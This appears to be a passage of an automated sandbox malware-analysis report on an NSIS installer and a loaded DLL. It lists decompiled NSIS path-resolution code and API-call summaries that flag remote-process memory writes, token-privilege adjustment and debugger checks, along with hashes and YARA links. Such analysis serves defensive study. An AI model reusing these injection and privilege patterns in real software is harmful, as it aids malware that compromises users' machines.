                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040717a
                                                                                                                                                    0x00407180
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407186
                                                                                                                                                    0x004071a0
                                                                                                                                                    0x004071a2
                                                                                                                                                    0x004071b2
                                                                                                                                                    0x004071c6
                                                                                                                                                    0x004071c9
                                                                                                                                                    0x004071cd
                                                                                                                                                    0x004071eb
                                                                                                                                                    0x004071ee
                                                                                                                                                    0x004071f7
                                                                                                                                                    0x004071fb
                                                                                                                                                    0x00407202
                                                                                                                                                    0x00407209
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004071cf
                                                                                                                                                    0x004071cf
                                                                                                                                                    0x004071d2
                                                                                                                                                    0x004071e3
                                                                                                                                                    0x004071e4
                                                                                                                                                    0x004071e7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004071cf
                                                                                                                                                    0x00406faa
                                                                                                                                                    0x00406f30
                                                                                                                                                    0x00406f3d
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                    • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                    • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory on Reboot("C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                    • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                    • API String ID: 1916479912-1189179171
                                                                                                                                                    • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                    • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                    • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                    • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E64C4B0, Relevance: 22.7, APIs: 15, Instructions: 189windowinjectionmemoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00001114,00000000,00000000), ref: 6E64C4ED
                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 6E64C4FB
                                                                                                                                                    • OpenProcess.KERNEL32(00000038,00000000,?), ref: 6E64C509
                                                                                                                                                    • VirtualAllocEx.KERNEL32(?,00000000,00001000,00003000,00000004), ref: 6E64C524
                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000008,0000003C,00000000), ref: 6E64C557
                                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 6E64C56C
                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,00000008,0000003C,00000000), ref: 6E64C582
                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,00000010,00000000), ref: 6E64C5E5
                                                                                                                                                    • SendMessageW.USER32(?,00001104,00000001,?), ref: 6E64C5FA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$MemoryMessageSend$Write$AllocOpenReadThreadVirtualWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 98512719-0
                                                                                                                                                    • Opcode ID: 14a0b25b15bfa10a4f3d566e2619113ec1b2cf86ff3c3ff038fe1c14660dcc7b
                                                                                                                                                    • Instruction ID: 27d3ce601fa82ea33aff9c8430b00c4923de8abb45d7a65a359b19bdcfb2ff57
                                                                                                                                                    • Opcode Fuzzy Hash: 14a0b25b15bfa10a4f3d566e2619113ec1b2cf86ff3c3ff038fe1c14660dcc7b
                                                                                                                                                    • Instruction Fuzzy Hash: 36711DB5A50209AFDB14CFE9CC95FEEBBB5EF49701F108119F606AB280D774A940CB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406831, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                                    			E00406831(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				signed short* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t46;
				WCHAR* _t47;
				signed int _t49;
				signed int _t50;
				signed int _t55;
				long _t65;
				signed int _t66;
				long _t68;
				signed int _t71;
				void* _t81;
				signed int _t84;
				signed short* _t88;
				signed int _t95;
				short _t96;
				void* _t103;
				WCHAR* _t104;
				void* _t106;
				signed int _t113;
				signed int _t115;
				void* _t116;

				_t106 = __esi;
				_t103 = __edi;
				_t81 = __ebx;
				_t46 = _a8;
				if(_t46 < 0) {
					_t46 =  *( *0x476a88 - 4 + _t46 * 4);
				}
				_t88 =  *0x47ead8 + _t46 * 2;
				_t47 = 0x46e220;
				_push(_t103);
				_t104 = 0x46e220;
				if(_a4 >= 0x46e220 && _a4 - 0x46e220 >> 1 < 0x4008) {
					_t104 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t95 =  *_t88 & 0x0000ffff;
				if(_t95 == 0) {
					L51:
					 *_t104 = 0;
					if(_a4 == 0) {
						return _t47;
					}
					return E00406035(_a4, _t47);
				} else {
					_push(_t81);
					_push(_t106);
					while((_t104 - _t47 & 0xfffffffe) < 0x4008) {
						_t96 = _t95 & 0x0000ffff;
						_t88 =  &(_t88[1]);
						_a8 = _t96;
						if((0x0000e000 & _t96) == 0) {
							__eflags = _t96 - 0xe000;
							L46:
							if(__eflags != 0) {
								 *_t104 = _t96;
								_t104 =  &(_t104[1]);
								__eflags = _t104;
							} else {
								 *_t104 =  *_t88;
								_t104 =  &(_t104[1]);
								_t88 =  &(_t88[1]);
							}
							L49:
							_t95 =  *_t88 & 0x0000ffff;
							if(_t95 != 0) {
								continue;
							}
							break;
						}
						if(_t96 <= 0xe000) {
							goto L46;
						}
						_t49 =  *_t88 & 0x0000ffff;
						_t50 = _t49 >> 8;
						_t84 = _t49 & 0x000000ff;
						_v16 = _t50;
						_v20 = _t50 | 0x00008000;
						_t113 = _t49 & 0x00007fff;
						_v24 = _t84;
						_v28 = _t84 | 0x00008000;
						_v12 =  &(_t88[1]);
						if(_a8 != 0xe002) {
							__eflags = _a8 - 0xe001;
							if(_a8 != 0xe001) {
								__eflags = _a8 - 0xe003;
								if(__eflags == 0) {
									__eflags = 0xe003;
									E00406831(_t84, _t104, _t113, _t104, 0xffffffffffffffff - _t113);
								}
								L44:
								_t55 = lstrlenW(_t104);
								_t88 = _v12;
								_t104 =  &(_t104[_t55]);
								_t47 = 0x46e220;
								goto L49;
							}
							__eflags = _t113 - 0x1d;
							if(_t113 != 0x1d) {
								__eflags = 0x47f000 + _t113 * 0x4008;
								E00406035(_t104, 0x47f000 + _t113 * 0x4008);
							} else {
								E00405F7D(_t104,  *0x47eab4);
							}
							__eflags = _t113 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L41:
								E00406064(_t104);
							}
							goto L44;
						}
						_t115 = 2;
						_t65 = GetVersion();
						if(_t65 >= 0 || _t65 == 0x5a04 || _v16 == 0x23 || _v16 == 0x2e) {
							_a8 = 1;
						} else {
							_a8 = _a8 & 0x00000000;
						}
						if( *0x47eb64 != 0) {
							_t115 = 4;
						}
						if(_t84 >= 0) {
							__eflags = _t84 - 0x25;
							if(_t84 != 0x25) {
								__eflags = _t84 - 0x24;
								if(_t84 == 0x24) {
									GetWindowsDirectoryW(_t104, 0x2004);
									_t115 = 0;
								}
								while(1) {
									__eflags = _t115;
									if(_t115 == 0) {
										goto L33;
									}
									_t66 =  *0x47eab0;
									_t115 = _t115 - 1;
									__eflags = _t66;
									if(_t66 == 0) {
										L29:
										_t68 = SHGetSpecialFolderLocation( *0x47eab4,  *(_t116 + _t115 * 4 - 0x18),  &_v8);
										__eflags = _t68;
										if(_t68 != 0) {
											L31:
											__eflags = 0;
											 *_t104 = 0;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t104);
										__imp__CoTaskMemFree(_v8);
										__eflags = _t68;
										if(_t68 != 0) {
											goto L33;
										}
										goto L31;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L29;
									}
									_t71 =  *_t66( *0x47eab4,  *(_t116 + _t115 * 4 - 0x18), 0, 0, _t104);
									__eflags = _t71;
									if(_t71 == 0) {
										goto L33;
									}
									goto L29;
								}
								goto L33;
							}
							GetSystemDirectoryW(_t104, 0x2004);
							goto L33;
						} else {
							_t86 = _t84 & 0x0000003f;
							E00405EFF(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x47ead8 + (_t84 & 0x0000003f) * 2, _t104, _t84 & 0x00000040);
							if( *_t104 != 0) {
								L34:
								if(_v16 == 0x1a) {
									lstrcatW(_t104, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L41;
							}
							E00406831(_t86, _t104, _t115, _t104, _v16);
							L33:
							if( *_t104 == 0) {
								goto L41;
							}
							goto L34;
						}
					}
					goto L51;
				}
			}





























                                                                                                                                                    0x00406831
                                                                                                                                                    0x00406831
                                                                                                                                                    0x00406831
                                                                                                                                                    0x00406834
                                                                                                                                                    0x0040683c
                                                                                                                                                    0x0040684d
                                                                                                                                                    0x0040684d
                                                                                                                                                    0x00406855
                                                                                                                                                    0x00406858
                                                                                                                                                    0x0040685d
                                                                                                                                                    0x0040685e
                                                                                                                                                    0x00406863
                                                                                                                                                    0x00406874
                                                                                                                                                    0x00406877
                                                                                                                                                    0x00406877
                                                                                                                                                    0x0040687b
                                                                                                                                                    0x00406881
                                                                                                                                                    0x00406aad
                                                                                                                                                    0x00406aaf
                                                                                                                                                    0x00406ab6
                                                                                                                                                    0x00406ac2
                                                                                                                                                    0x00406ac2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406887
                                                                                                                                                    0x00406887
                                                                                                                                                    0x00406888
                                                                                                                                                    0x00406889
                                                                                                                                                    0x0040689c
                                                                                                                                                    0x004068a4
                                                                                                                                                    0x004068a7
                                                                                                                                                    0x004068ac
                                                                                                                                                    0x00406a86
                                                                                                                                                    0x00406a89
                                                                                                                                                    0x00406a89
                                                                                                                                                    0x00406a99
                                                                                                                                                    0x00406a9c
                                                                                                                                                    0x00406a9c
                                                                                                                                                    0x00406a8b
                                                                                                                                                    0x00406a8e
                                                                                                                                                    0x00406a91
                                                                                                                                                    0x00406a94
                                                                                                                                                    0x00406a94
                                                                                                                                                    0x00406a9f
                                                                                                                                                    0x00406a9f
                                                                                                                                                    0x00406aa5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406aa5
                                                                                                                                                    0x004068b5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004068bb
                                                                                                                                                    0x004068c2
                                                                                                                                                    0x004068c5
                                                                                                                                                    0x004068cb
                                                                                                                                                    0x004068d5
                                                                                                                                                    0x004068e6
                                                                                                                                                    0x004068ec
                                                                                                                                                    0x004068ef
                                                                                                                                                    0x004068f2
                                                                                                                                                    0x004068f9
                                                                                                                                                    0x00406a1e
                                                                                                                                                    0x00406a22
                                                                                                                                                    0x00406a60
                                                                                                                                                    0x00406a64
                                                                                                                                                    0x00406a69
                                                                                                                                                    0x00406a6d
                                                                                                                                                    0x00406a6d
                                                                                                                                                    0x00406a72
                                                                                                                                                    0x00406a73
                                                                                                                                                    0x00406a79
                                                                                                                                                    0x00406a7c
                                                                                                                                                    0x00406a7f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406a7f
                                                                                                                                                    0x00406a24
                                                                                                                                                    0x00406a27
                                                                                                                                                    0x00406a3f
                                                                                                                                                    0x00406a46
                                                                                                                                                    0x00406a29
                                                                                                                                                    0x00406a30
                                                                                                                                                    0x00406a30
                                                                                                                                                    0x00406a4e
                                                                                                                                                    0x00406a51
                                                                                                                                                    0x00406a53
                                                                                                                                                    0x00406a54
                                                                                                                                                    0x00406a54
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406a51
                                                                                                                                                    0x00406901
                                                                                                                                                    0x00406902
                                                                                                                                                    0x0040690a
                                                                                                                                                    0x00406928
                                                                                                                                                    0x00406922
                                                                                                                                                    0x00406922
                                                                                                                                                    0x00406922
                                                                                                                                                    0x00406936
                                                                                                                                                    0x0040693a
                                                                                                                                                    0x0040693a
                                                                                                                                                    0x0040693d
                                                                                                                                                    0x00406979
                                                                                                                                                    0x0040697c
                                                                                                                                                    0x0040698c
                                                                                                                                                    0x0040698f
                                                                                                                                                    0x00406997
                                                                                                                                                    0x0040699d
                                                                                                                                                    0x0040699d
                                                                                                                                                    0x004069fb
                                                                                                                                                    0x004069fb
                                                                                                                                                    0x004069fd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004069a1
                                                                                                                                                    0x004069a8
                                                                                                                                                    0x004069a9
                                                                                                                                                    0x004069ab
                                                                                                                                                    0x004069c5
                                                                                                                                                    0x004069d3
                                                                                                                                                    0x004069d9
                                                                                                                                                    0x004069db
                                                                                                                                                    0x004069f6
                                                                                                                                                    0x004069f6
                                                                                                                                                    0x004069f8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004069f8
                                                                                                                                                    0x004069e1
                                                                                                                                                    0x004069ec
                                                                                                                                                    0x004069f2
                                                                                                                                                    0x004069f4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004069f4
                                                                                                                                                    0x004069ad
                                                                                                                                                    0x004069b0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004069bf
                                                                                                                                                    0x004069c1
                                                                                                                                                    0x004069c3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004069c3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004069fb
                                                                                                                                                    0x00406984
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040693f
                                                                                                                                                    0x0040694b
                                                                                                                                                    0x0040695c
                                                                                                                                                    0x00406965
                                                                                                                                                    0x00406a05
                                                                                                                                                    0x00406a09
                                                                                                                                                    0x00406a11
                                                                                                                                                    0x00406a11
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406a09
                                                                                                                                                    0x0040696f
                                                                                                                                                    0x004069ff
                                                                                                                                                    0x00406a03
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406a03
                                                                                                                                                    0x0040693d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00406aac

                                                                                                                                                    APIs
                                                                                                                                                    • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425AD2,74B5EA30,00000000), ref: 00406902
                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                    • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                    • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00425AD2,74B5EA30,00000000), ref: 00406A73
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                    • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                    • API String ID: 3581403547-1792361021
                                                                                                                                                    • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                    • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                    • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                    • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E621870, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 78COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 6E621894
                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 6E62189B
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 6E6218C6
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6E6218D4
                                                                                                                                                      • Part of subcall function 6E628340: __vfwprintf_l.LIBCONCRTD ref: 6E628361
                                                                                                                                                    Strings
                                                                                                                                                    • Failed AdjustTokenPrivileges, xrefs: 6E62194A
                                                                                                                                                    • Failed LookupPrivilegeValue, xrefs: 6E6218DA
                                                                                                                                                    • Failed OpenProcessToken, xrefs: 6E6218A5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CloseCurrentHandleLookupOpenPrivilegeTokenValue__vfwprintf_l
                                                                                                                                                    • String ID: Failed AdjustTokenPrivileges$Failed LookupPrivilegeValue$Failed OpenProcessToken
                                                                                                                                                    • API String ID: 1520876028-3617082681
                                                                                                                                                    • Opcode ID: 04e1bb911d1b0268198250f2fe1ab7db63c2a9d738909033850b4f2d939800cf
                                                                                                                                                    • Instruction ID: 4e8d8289be8f817df87bcca207eb4542e676521771a08eb2e927bc5b62e7612c
                                                                                                                                                    • Opcode Fuzzy Hash: 04e1bb911d1b0268198250f2fe1ab7db63c2a9d738909033850b4f2d939800cf
                                                                                                                                                    • Instruction Fuzzy Hash: 53314CB0A04209AFEF04DFE5D955BEE7BB9EB49304F104129E906AA380D7759944CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E64C370, Relevance: 15.1, APIs: 10, Instructions: 105windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E64B6D0: _DebugHeapAllocator.LIBCPMTD ref: 6E64B727
                                                                                                                                                    • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 6E64C39D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeapMessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3929914780-0
                                                                                                                                                    • Opcode ID: 89f76c5f9c68a8680530310ee5c249524406f6fe84b66ee2bb640c67aad85a9d
                                                                                                                                                    • Instruction ID: 19f55e4df5208e09a364c2c2c0ad79b5d44fee6f0922b336ea044363634c4f74
                                                                                                                                                    • Opcode Fuzzy Hash: 89f76c5f9c68a8680530310ee5c249524406f6fe84b66ee2bb640c67aad85a9d
                                                                                                                                                    • Instruction Fuzzy Hash: 8641F9B5A40308FBEB14CBE5CC55FAEBBB4AB49701F108158F606AB384D6B4A644CB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E679FF6, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __floor_pentium4
                                                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                                                    • Opcode ID: 5ec14968a31b5842c741d5cdabf283762292ebaaee1994fa67a1690d65e92545
                                                                                                                                                    • Instruction ID: a13deae9e4ebc4db8a21ae36ba942c1110c5ed43fb024d7275d71f4ba1c0b818
                                                                                                                                                    • Opcode Fuzzy Hash: 5ec14968a31b5842c741d5cdabf283762292ebaaee1994fa67a1690d65e92545
                                                                                                                                                    • Instruction Fuzzy Hash: B2C24671E186298FDF74CEA8CD507DAB3B9EB49304F1041EAD81DA7244E779AE818F41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65041D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OutputDebugStringA.KERNEL32(IsolationAware function called after IsolationAwareCleanup), ref: 6E650431
                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E650468
                                                                                                                                                    Strings
                                                                                                                                                    • IsolationAware function called after IsolationAwareCleanup, xrefs: 6E65042C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DebugErrorLastOutputString
                                                                                                                                                    • String ID: IsolationAware function called after IsolationAwareCleanup
                                                                                                                                                    • API String ID: 4132100945-2690750368
                                                                                                                                                    • Opcode ID: 1efb1b4b62eb66010f6a2476c7f1bb6b09e7a4410b84e4c48246f62ea5ec1f86
                                                                                                                                                    • Instruction ID: 870481527197b245ff0d1fb884ab5bed372ee291407bb8cdb67d468c4dbe3510
                                                                                                                                                    • Opcode Fuzzy Hash: 1efb1b4b62eb66010f6a2476c7f1bb6b09e7a4410b84e4c48246f62ea5ec1f86
                                                                                                                                                    • Instruction Fuzzy Hash: B2F0A935394623CA9FE85EE689606BE3B58AB07749364092AE912D6314FB20CC70C6E1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6652CE, Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6E6653C6
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E6653D0
                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6E6653DD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                    • Opcode ID: 2b08784c4d3ec4c82fdd48551108b448058584bd95e7e80071e4a5d018357e07
                                                                                                                                                    • Instruction ID: 73cf0702ed0b51c7929666871b544883b89dd64dfc6eb6482e73635a6b10207f
                                                                                                                                                    • Opcode Fuzzy Hash: 2b08784c4d3ec4c82fdd48551108b448058584bd95e7e80071e4a5d018357e07
                                                                                                                                                    • Instruction Fuzzy Hash: BB310374911229ABCB61DF64D888BCDBBB8BF18310F1045EAE41DA7250EB709B858F85
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

